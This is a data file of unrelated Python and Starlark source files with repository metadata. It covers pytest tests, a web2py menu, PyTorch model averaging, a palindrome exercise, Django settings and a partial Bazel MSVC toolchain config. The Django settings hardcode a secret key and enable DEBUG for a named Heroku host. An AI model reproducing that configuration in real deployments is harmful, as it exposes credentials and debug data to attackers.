@pytest.mark.parametrize("id, expectation", [
(WINDOW_HANDLE_1_ID, does_not_raise()),
("Not valid ID", pytest.raises(WindowHandleIdNotValidError)),
])
def test_window_handle_controller_remove_handle_by_id_invalid_error(id: str, expectation: Any, window_handle_controller: WindowHandleController) -> None:
with expectation:
        window_handle_controller.remove_handle_by_id(id)
@pytest.mark.parametrize("id, expectation", [
(WINDOW_HANDLE_1_ID, does_not_raise()),
(WINDOW_HANDLE_4_ID, pytest.raises(WindowHandleIdNotFoundError)),
])
def test_window_handle_controller_remove_handle_by_id_not_found_error(id: str, expectation: Any, window_handle_controller: WindowHandleController) -> None:
with expectation:
        window_handle_controller.remove_handle_by_id(id)
| true
| true
|
790dd8b5cd7edaafbdebd0957f76e3486a2f9a9e
| 6,153
|
py
|
Python
|
applications/javelin/models/menu.py
|
jjacobson93/javelin-web2py
|
d4de493156c6893acca74d4be7f4597c90c418f3
|
[
"BSD-3-Clause"
] | null | null | null |
applications/javelin/models/menu.py
|
jjacobson93/javelin-web2py
|
d4de493156c6893acca74d4be7f4597c90c418f3
|
[
"BSD-3-Clause"
] | null | null | null |
applications/javelin/models/menu.py
|
jjacobson93/javelin-web2py
|
d4de493156c6893acca74d4be7f4597c90c418f3
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# this file is released under public domain and you can use without limitations
#########################################################################
## Customize your APP title, subtitle and menus here
#########################################################################
response.logo = A('Javelin',_class="brand",_href="/")
response.title = request.application.replace('_',' ').title()
## read more at http://dev.w3.org/html5/markup/meta.name.html
response.meta.author = 'Your Name <you@example.com>'
response.meta.description = 'a cool new app'
response.meta.keywords = 'web2py, python, framework'
response.meta.generator = 'Web2py Web Framework'
## your http://google.com/analytics id
response.google_analytics_id = None
#########################################################################
## this is the main application menu add/remove items as required
#########################################################################
response.menu = [
(T('Home'), False, URL('default', 'index'), [])
]
DEVELOPMENT_MENU = True
#########################################################################
## provide shortcuts for development. remove in production
#########################################################################
def _():
# shortcuts
app = request.application
ctr = request.controller
# useful links to internal and external resources
response.menu += [
(SPAN('web2py', _class='highlighted'), False, 'http://web2py.com', [
(T('My Sites'), False, URL('admin', 'default', 'site')),
(T('This App'), False, URL('admin', 'default', 'design/%s' % app), [
(T('Controller'), False,
URL(
'admin', 'default', 'edit/%s/controllers/%s.py' % (app, ctr))),
(T('View'), False,
URL(
'admin', 'default', 'edit/%s/views/%s' % (app, response.view))),
(T('Layout'), False,
URL(
'admin', 'default', 'edit/%s/views/layout.html' % app)),
(T('Stylesheet'), False,
URL(
'admin', 'default', 'edit/%s/static/css/web2py.css' % app)),
(T('DB Model'), False,
URL(
'admin', 'default', 'edit/%s/models/db.py' % app)),
(T('Menu Model'), False,
URL(
'admin', 'default', 'edit/%s/models/menu.py' % app)),
(T('Database'), False, URL(app, 'appadmin', 'index')),
(T('Errors'), False, URL(
'admin', 'default', 'errors/' + app)),
(T('About'), False, URL(
'admin', 'default', 'about/' + app)),
]),
('web2py.com', False, 'http://www.web2py.com', [
(T('Download'), False,
'http://www.web2py.com/examples/default/download'),
(T('Support'), False,
'http://www.web2py.com/examples/default/support'),
(T('Demo'), False, 'http://web2py.com/demo_admin'),
(T('Quick Examples'), False,
'http://web2py.com/examples/default/examples'),
(T('FAQ'), False, 'http://web2py.com/AlterEgo'),
(T('Videos'), False,
'http://www.web2py.com/examples/default/videos/'),
(T('Free Applications'),
False, 'http://web2py.com/appliances'),
(T('Plugins'), False, 'http://web2py.com/plugins'),
(T('Layouts'), False, 'http://web2py.com/layouts'),
(T('Recipes'), False, 'http://web2pyslices.com/'),
(T('Semantic'), False, 'http://web2py.com/semantic'),
]),
(T('Documentation'), False, 'http://www.web2py.com/book', [
(T('Preface'), False,
'http://www.web2py.com/book/default/chapter/00'),
(T('Introduction'), False,
'http://www.web2py.com/book/default/chapter/01'),
(T('Python'), False,
'http://www.web2py.com/book/default/chapter/02'),
(T('Overview'), False,
'http://www.web2py.com/book/default/chapter/03'),
(T('The Core'), False,
'http://www.web2py.com/book/default/chapter/04'),
(T('The Views'), False,
'http://www.web2py.com/book/default/chapter/05'),
(T('Database'), False,
'http://www.web2py.com/book/default/chapter/06'),
(T('Forms and Validators'), False,
'http://www.web2py.com/book/default/chapter/07'),
(T('Email and SMS'), False,
'http://www.web2py.com/book/default/chapter/08'),
(T('Access Control'), False,
'http://www.web2py.com/book/default/chapter/09'),
(T('Services'), False,
'http://www.web2py.com/book/default/chapter/10'),
(T('Ajax Recipes'), False,
'http://www.web2py.com/book/default/chapter/11'),
(T('Components and Plugins'), False,
'http://www.web2py.com/book/default/chapter/12'),
(T('Deployment Recipes'), False,
'http://www.web2py.com/book/default/chapter/13'),
(T('Other Recipes'), False,
'http://www.web2py.com/book/default/chapter/14'),
(T('Buy this book'), False,
'http://stores.lulu.com/web2py'),
]),
(T('Community'), False, None, [
(T('Groups'), False,
'http://www.web2py.com/examples/default/usergroups'),
(T('Twitter'), False, 'http://twitter.com/web2py'),
(T('Live Chat'), False,
'http://webchat.freenode.net/?channels=web2py'),
]),
(T('Plugins'), False, None, [
('plugin_wiki', False,
'http://web2py.com/examples/default/download'),
(T('Other Plugins'), False,
'http://web2py.com/plugins'),
(T('Layout Plugins'),
False, 'http://web2py.com/layouts'),
])
]
)]
if DEVELOPMENT_MENU: _()
if "auth" in locals(): auth.wikimenu()
| 44.266187
| 79
| 0.478628
| true
| true
|
|
790dd98e40c32e5ef94d00d466dc9334c2cc8fca
| 376
|
py
|
Python
|
noncookingjob.py
|
vmlane/jobMatcher
|
f5929134e6e14786ca9f71cc0329f0fed59b35da
|
[
"MIT"
] | null | null | null |
noncookingjob.py
|
vmlane/jobMatcher
|
f5929134e6e14786ca9f71cc0329f0fed59b35da
|
[
"MIT"
] | null | null | null |
noncookingjob.py
|
vmlane/jobMatcher
|
f5929134e6e14786ca9f71cc0329f0fed59b35da
|
[
"MIT"
] | null | null | null |
from job import *
class NoncookingJob(Job):
    def __init__(self, name, prefs, maxMatches):
        Job.__init__(self, name, prefs, maxMatches)
        # keep only multi-person entries that have cooked fewer than 4
        # semesters; list() keeps self.prefs a real list under Python 3,
        # where filter() returns a lazy iterator
        self.prefs = list(filter(lambda x: x.numPeople != 1 and x.semsCooked < 4, self.prefs))
        # sort the remaining people by number of semesters cooked, high to low
        self.prefs.sort(key=lambda x: x.semsCooked, reverse=True)
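
# Minimal sanity sketch of the selection rule above (illustrative addition,
# not part of the original module; Person is a stand-in stub, not the real
# preference type imported from `job`):
if __name__ == "__main__":
    from collections import namedtuple

    Person = namedtuple("Person", "name numPeople semsCooked")
    people = [Person("solo", 1, 2), Person("pair", 2, 1), Person("vets", 3, 5)]
    kept = [p for p in people if p.numPeople != 1 and p.semsCooked < 4]
    assert [p.name for p in kept] == ["pair"]  # singletons and 4+ semester cooks are dropped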
| 37.6
| 83
| 0.728723
|
from job import *
class NoncookingJob(Job):
    def __init__(self, name, prefs, maxMatches):
        Job.__init__(self, name, prefs, maxMatches)
        self.prefs = list(filter(lambda x: x.numPeople != 1 and x.semsCooked < 4, self.prefs))
        self.prefs.sort(key=lambda x: x.semsCooked, reverse=True)
| true
| true
|
790ddbcd7888dfff9258436b8a98ccebabef1cd9
| 4,941
|
py
|
Python
|
torch/distributed/algorithms/model_averaging/averagers.py
|
vuanvin/pytorch
|
9267fd8d7395074001ad7cf2a8f28082dbff6b0b
|
[
"Intel"
] | 1
|
2022-01-20T03:49:23.000Z
|
2022-01-20T03:49:23.000Z
|
torch/distributed/algorithms/model_averaging/averagers.py
|
vuanvin/pytorch
|
9267fd8d7395074001ad7cf2a8f28082dbff6b0b
|
[
"Intel"
] | 14
|
2021-10-14T06:58:50.000Z
|
2021-12-17T11:51:07.000Z
|
torch/distributed/algorithms/model_averaging/averagers.py
|
vuanvin/pytorch
|
9267fd8d7395074001ad7cf2a8f28082dbff6b0b
|
[
"Intel"
] | null | null | null |
import warnings
from abc import ABC, abstractmethod
import torch.distributed as dist
import torch.distributed.algorithms.model_averaging.utils as utils
class ModelAverager(ABC):
r"""Base class for all model averagers.
Args:
process_group: The process group to be used for all-reduce.
If ``None``, the default process group, which
is created by :func:`torch.distributed.init_process_group`,
will be used. (default: ``None``)
"""
def __init__(self, process_group=None):
self.process_group = (
process_group if process_group is not None else dist.group.WORLD
)
self.step = 0
@abstractmethod
def average_parameters(self, params):
raise NotImplementedError
class PeriodicModelAverager(ModelAverager):
r"""
Averages parameters periodically after the warm-up stage.
This can be used for running `post-local SGD <https://arxiv.org/abs/1808.07217>`_,
by running :class:`~torch.nn.DistributedDataParallel` (DDP)
using the subgroups created by :meth:`~torch.distributed.new_subgroups`.
Args:
period (int): The number of steps per model averaging.
Usually the period should be greater than ``1`` to reduce the communication cost.
Otherwise, only DDP needs to be used.
warmup_steps (int): The number of warm-up steps. During this stage,
model averaging is skipped.
process_group: The process group to be used for all-reduce.
If ``None``, the default process group, which
is created by :func:`torch.distributed.init_process_group`,
will be used. (default: ``None``)
Example::
>>> import torch
>>> import torch.distributed as dist
>>> import torch.distributed.algorithms.ddp_comm_hooks.post_localSGD_hook as post_localSGD
>>> import torch.distributed.algorithms.model_averaging.averagers as averagers
>>> import torch.nn as nn
>>>
>>> dist.init_process_group("nccl", rank=rank, world_size=16)
>>> torch.cuda.set_device(rank)
>>> module = nn.Linear(1, 1, bias=False).to(rank)
>>> model = nn.parallel.DistributedDataParallel(
>>> module, device_ids=[rank], output_device=rank
>>> )
>>> # Register a post-localSGD communication hook.
>>> subgroup, subgroups = dist.new_subgroups()
    >>> state = post_localSGD.PostLocalSGDState(process_group=None, subgroup=subgroup, start_localSGD_iter=100)
    >>> model.register_comm_hook(state, post_localSGD.post_localSGD_hook)
>>>
>>> # In the first 100 steps, run global gradient averaging like normal DDP at every step.
>>> # After 100 steps, run model averaging every 4 steps.
>>> # Note that ``warmup_steps`` must be the same as ``start_localSGD_iter`` used in ``PostLocalSGDState``.
>>> averager = averagers.PeriodicModelAverager(period=4, warmup_steps=100)
>>> for step in range(0, 200):
>>> optimizer.zero_grad()
>>> loss = loss_fn(output, labels)
>>> loss.backward()
>>> optimizer.step()
>>> # Average parameters globally after ``optimizer.step()``.
>>> # Thus, the inter-node communication only occurs periodically after ``warmup_steps``.
>>> averager.average_parameters(model.parameters())
.. warning ::
`PeriodicModelAverager` is experimental and subject to change.
"""
def __init__(
self,
period,
warmup_steps=0,
process_group=None,
):
super().__init__(process_group)
if warmup_steps < 0:
raise ValueError("Arg ``warmup_steps`` must be a non-negative number.")
self.warmup_steps = warmup_steps
if period < 1:
raise ValueError("Arg ``period`` must be a positive value.")
elif period == 1:
warnings.warn(
"When period is 1, no need to use model averaging because the communication cost "
"of all-reducing parameters will be no less than the cost of all-reducing gradients "
"by DistributedDataParall in the backward pass. Therefore, only "
"DistributedDataParallel should be used for this case."
)
self.period = period
def average_parameters(self, params):
r"""
Averages parameters if ``step`` is no less than ``warmup_steps``
and it can be divided by ``period``, where ``step`` is increased by 1
at each iteration in the training loop.
"""
if (
self.step >= self.warmup_steps
and (self.step - self.warmup_steps) % self.period == 0
):
utils.average_parameters(iter(params), self.process_group)
self.step += 1
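
# Quick sanity sketch of the averaging schedule above (illustrative addition,
# not part of the original module; runs without any distributed setup):
if __name__ == "__main__":
    warmup_steps, period = 100, 4
    fired = [step for step in range(120)
             if step >= warmup_steps and (step - warmup_steps) % period == 0]
    assert fired[:3] == [100, 104, 108]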
| 42.230769
| 116
| 0.612224
|
import warnings
from abc import ABC, abstractmethod
import torch.distributed as dist
import torch.distributed.algorithms.model_averaging.utils as utils
class ModelAverager(ABC):
def __init__(self, process_group=None):
self.process_group = (
process_group if process_group is not None else dist.group.WORLD
)
self.step = 0
@abstractmethod
def average_parameters(self, params):
raise NotImplementedError
class PeriodicModelAverager(ModelAverager):
def __init__(
self,
period,
warmup_steps=0,
process_group=None,
):
super().__init__(process_group)
if warmup_steps < 0:
raise ValueError("Arg ``warmup_steps`` must be a non-negative number.")
self.warmup_steps = warmup_steps
if period < 1:
raise ValueError("Arg ``period`` must be a positive value.")
elif period == 1:
warnings.warn(
"When period is 1, no need to use model averaging because the communication cost "
"of all-reducing parameters will be no less than the cost of all-reducing gradients "
"by DistributedDataParall in the backward pass. Therefore, only "
"DistributedDataParallel should be used for this case."
)
self.period = period
def average_parameters(self, params):
if (
self.step >= self.warmup_steps
and (self.step - self.warmup_steps) % self.period == 0
):
utils.average_parameters(iter(params), self.process_group)
self.step += 1
| true
| true
|
790ddc222efaf49cc540383db964dfb094041101
| 1,097
|
py
|
Python
|
Day 18/Queue and stacks.py
|
SayanBan/HackerRank-30-Days-of-code
|
c2fea8304d7c9af13748fcce57c07a7ca180eda4
|
[
"MIT"
] | 2
|
2019-11-20T04:45:27.000Z
|
2019-12-07T04:31:47.000Z
|
Day 18/Queue and stacks.py
|
SayanBan/HackerRank-30-Days-of-code
|
c2fea8304d7c9af13748fcce57c07a7ca180eda4
|
[
"MIT"
] | null | null | null |
Day 18/Queue and stacks.py
|
SayanBan/HackerRank-30-Days-of-code
|
c2fea8304d7c9af13748fcce57c07a7ca180eda4
|
[
"MIT"
] | 1
|
2019-12-07T04:31:59.000Z
|
2019-12-07T04:31:59.000Z
|
import sys
class Solution:
# Write your code here
def __init__(self):
self.stack = []
self.queue = []
def popCharacter(self):
return self.stack.pop()
def pushCharacter(self, char):
self.stack.append(char)
def dequeueCharacter(self):
char = self.queue[0]
self.queue = self.queue[1:]
return char
def enqueueCharacter(self, char):
self.queue.append(char)
# read the string s
s=input()
#Create the Solution class object
obj=Solution()
l=len(s)
# push/enqueue all the characters of string s to stack
for i in range(l):
obj.pushCharacter(s[i])
obj.enqueueCharacter(s[i])
isPalindrome=True
'''
pop the top character from stack
dequeue the first character from queue
compare both the characters
'''
for i in range(l // 2):
if obj.popCharacter()!=obj.dequeueCharacter():
isPalindrome=False
break
#finally print whether string s is palindrome or not.
if isPalindrome:
print("The word, "+s+", is a palindrome.")
else:
print("The word, "+s+", is not a palindrome.")
| 22.854167
| 54
| 0.646308
|
import sys
class Solution:
def __init__(self):
self.stack = []
self.queue = []
def popCharacter(self):
return self.stack.pop()
def pushCharacter(self, char):
self.stack.append(char)
def dequeueCharacter(self):
char = self.queue[0]
self.queue = self.queue[1:]
return char
def enqueueCharacter(self, char):
self.queue.append(char)
s=input()
obj=Solution()
l=len(s)
for i in range(l):
obj.pushCharacter(s[i])
obj.enqueueCharacter(s[i])
isPalindrome=True
for i in range(l // 2):
if obj.popCharacter()!=obj.dequeueCharacter():
isPalindrome=False
break
if isPalindrome:
print("The word, "+s+", is a palindrome.")
else:
print("The word, "+s+", is not a palindrome.")
| true
| true
|
790ddc9a7829e5f42dca0f59b4903dfd9d2f3621
| 4,564
|
py
|
Python
|
locallibrary/settings.py
|
TheRedemp7ion/DjangoLocalLibrary
|
e3c49da272d863185681b2b934c45a4693054a7a
|
[
"Unlicense"
] | null | null | null |
locallibrary/settings.py
|
TheRedemp7ion/DjangoLocalLibrary
|
e3c49da272d863185681b2b934c45a4693054a7a
|
[
"Unlicense"
] | null | null | null |
locallibrary/settings.py
|
TheRedemp7ion/DjangoLocalLibrary
|
e3c49da272d863185681b2b934c45a4693054a7a
|
[
"Unlicense"
] | null | null | null |
"""
Django settings for locallibrary project.
Generated by 'django-admin startproject' using Django 3.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import pytz
import os # needed by code below
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-@*cqyd6l)4*=yg7r19zmp#y32mpus(a2d-)ny&hstt^kq!13jk'
#SECRET_KEY = os.environ.get('DJANGO_SECRET_KEY', 'cg#p$g+j9tax!#a3cup@1$8obt2_+&k3q+pmu)5%asj6yjpkag')
#with open('/etc/secret_key.txt') as f:
# SECRET_KEY = f.read().strip()
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['obscure-plateau-04602.herokuapp.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'catalog.apps.CatalogConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'locallibrary.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'locallibrary.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
# Redirect to home URL after login (Default redirects to /accounts/profile/)
LOGIN_REDIRECT_URL = '/'
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
# to view it console, never add in actual site
# Heroku: Update database configuration from $DATABASE_URL.
import dj_database_url
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
# The absolute path to the directory where collectstatic will collect static files for deployment.
STATIC_ROOT = BASE_DIR / 'staticfiles'
# Simplified static file serving.
# https://warehouse.python.org/project/whitenoise/
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
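
# Deploy-time note (commands illustrative, not part of the settings module):
# run `python manage.py collectstatic --noinput` so WhiteNoise can serve the
# files gathered into STATIC_ROOT above.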
| 29.070064
| 103
| 0.724803
|
from pathlib import Path
import pytz
import os
BASE_DIR = Path(__file__).resolve().parent.parent
SECRET_KEY = 'django-insecure-@*cqyd6l)4*=yg7r19zmp#y32mpus(a2d-)ny&hstt^kq!13jk'
DEBUG = True
ALLOWED_HOSTS = ['obscure-plateau-04602.herokuapp.com']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'catalog.apps.CatalogConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'locallibrary.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'locallibrary.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Kolkata'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
# Redirect to home URL after login (Default redirects to /accounts/profile/)
LOGIN_REDIRECT_URL = '/'
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
# to view it console, never add in actual site
# Heroku: Update database configuration from $DATABASE_URL.
import dj_database_url
db_from_env = dj_database_url.config(conn_max_age=500)
DATABASES['default'].update(db_from_env)
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
# The absolute path to the directory where collectstatic will collect static files for deployment.
STATIC_ROOT = BASE_DIR / 'staticfiles'
# Simplified static file serving.
# https://warehouse.python.org/project/whitenoise/
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
| true
| true
|
790ddcb0947ec5c383af11aaf8bdbcf8ab880246
| 60,361
|
bzl
|
Python
|
third_party/toolchains/bazel_0.23.2_rbe_windows/cc_toolchain_config.bzl
|
suever/grpc
|
0bee8c41f9c52f81a06fbd8444b2d53249c484a9
|
[
"Apache-2.0"
] | 2
|
2019-05-26T05:00:55.000Z
|
2019-06-15T10:18:57.000Z
|
third_party/toolchains/bazel_0.23.2_rbe_windows/cc_toolchain_config.bzl
|
suever/grpc
|
0bee8c41f9c52f81a06fbd8444b2d53249c484a9
|
[
"Apache-2.0"
] | 2
|
2017-03-07T22:54:36.000Z
|
2017-04-14T15:17:36.000Z
|
third_party/toolchains/bazel_0.23.2_rbe_windows/cc_toolchain_config.bzl
|
suever/grpc
|
0bee8c41f9c52f81a06fbd8444b2d53249c484a9
|
[
"Apache-2.0"
] | 4
|
2020-08-10T06:05:01.000Z
|
2021-12-12T09:26:50.000Z
|
# Copyright 2019 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A Starlark cc_toolchain configuration rule"""
load(
"@bazel_tools//tools/cpp:cc_toolchain_config_lib.bzl",
"action_config",
"artifact_name_pattern",
"env_entry",
"env_set",
"feature",
"feature_set",
"flag_group",
"flag_set",
"make_variable",
"tool",
"tool_path",
"variable_with_value",
"with_feature_set",
)
load("@bazel_tools//tools/build_defs/cc:action_names.bzl", "ACTION_NAMES")
all_compile_actions = [
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.clif_match,
ACTION_NAMES.lto_backend,
]
all_cpp_compile_actions = [
ACTION_NAMES.cpp_compile,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.clif_match,
]
preprocessor_compile_actions = [
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.clif_match,
]
codegen_compile_actions = [
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
]
all_link_actions = [
ACTION_NAMES.cpp_link_executable,
ACTION_NAMES.cpp_link_dynamic_library,
ACTION_NAMES.cpp_link_nodeps_dynamic_library,
]
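
# Note: each action_config below binds one Bazel action name to the MSVC tool
# that runs it (cl.exe, link.exe, lib.exe, or ml64.exe) and lists the features
# the action implies.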
def _windows_msvc_impl(ctx):
toolchain_identifier = "msvc_x64"
host_system_name = "local"
target_system_name = "local"
target_cpu = "x64_windows"
target_libc = "msvcrt"
compiler = "msvc-cl"
abi_version = "local"
abi_libc_version = "local"
cc_target_os = None
builtin_sysroot = None
cxx_builtin_include_directories = [
# This is a workaround for https://github.com/bazelbuild/bazel/issues/5087.
"C:\\botcode\\w",
"c:/tools/msys64/usr/",
"C:\\Program Files (x86)\\Microsoft Visual Studio 14.0\\VC\\INCLUDE",
"C:\\Program Files (x86)\\Windows Kits\\10\\include\\10.0.10240.0\\ucrt",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\shared",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\um",
"C:\\Program Files (x86)\\Windows Kits\\8.1\\include\\winrt",
]
cpp_link_nodeps_dynamic_library_action = action_config(
action_name = ACTION_NAMES.cpp_link_nodeps_dynamic_library,
implies = [
"nologo",
"shared_flag",
"linkstamps",
"output_execpath_flags",
"input_param_flags",
"user_link_flags",
"default_link_flags",
"linker_subsystem_flag",
"linker_param_file",
"msvc_env",
"no_stripping",
"has_configured_linker_path",
"def_file",
],
tools = [tool(path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/link.exe")],
)
cpp_link_static_library_action = action_config(
action_name = ACTION_NAMES.cpp_link_static_library,
implies = [
"nologo",
"archiver_flags",
"input_param_flags",
"linker_param_file",
"msvc_env",
],
tools = [tool(path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/lib.exe")],
)
assemble_action = action_config(
action_name = ACTION_NAMES.assemble,
implies = [
"compiler_input_flags",
"compiler_output_flags",
"nologo",
"msvc_env",
"sysroot",
],
tools = [tool(path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/ml64.exe")],
)
preprocess_assemble_action = action_config(
action_name = ACTION_NAMES.preprocess_assemble,
implies = [
"compiler_input_flags",
"compiler_output_flags",
"nologo",
"msvc_env",
"sysroot",
],
tools = [tool(path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/ml64.exe")],
)
c_compile_action = action_config(
action_name = ACTION_NAMES.c_compile,
implies = [
"compiler_input_flags",
"compiler_output_flags",
"default_compile_flags",
"nologo",
"msvc_env",
"parse_showincludes",
"user_compile_flags",
"sysroot",
"unfiltered_compile_flags",
],
tools = [tool(path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/cl.exe")],
)
cpp_compile_action = action_config(
action_name = ACTION_NAMES.cpp_compile,
implies = [
"compiler_input_flags",
"compiler_output_flags",
"default_compile_flags",
"nologo",
"msvc_env",
"parse_showincludes",
"user_compile_flags",
"sysroot",
"unfiltered_compile_flags",
],
tools = [tool(path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/cl.exe")],
)
cpp_link_executable_action = action_config(
action_name = ACTION_NAMES.cpp_link_executable,
implies = [
"nologo",
"linkstamps",
"output_execpath_flags",
"input_param_flags",
"user_link_flags",
"default_link_flags",
"linker_subsystem_flag",
"linker_param_file",
"msvc_env",
"no_stripping",
],
tools = [tool(path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/link.exe")],
)
cpp_link_dynamic_library_action = action_config(
action_name = ACTION_NAMES.cpp_link_dynamic_library,
implies = [
"nologo",
"shared_flag",
"linkstamps",
"output_execpath_flags",
"input_param_flags",
"user_link_flags",
"default_link_flags",
"linker_subsystem_flag",
"linker_param_file",
"msvc_env",
"no_stripping",
"has_configured_linker_path",
"def_file",
],
tools = [tool(path = "C:/Program Files (x86)/Microsoft Visual Studio 14.0/VC/bin/amd64/link.exe")],
)
action_configs = [
assemble_action,
preprocess_assemble_action,
c_compile_action,
cpp_compile_action,
cpp_link_executable_action,
cpp_link_dynamic_library_action,
cpp_link_nodeps_dynamic_library_action,
cpp_link_static_library_action,
]
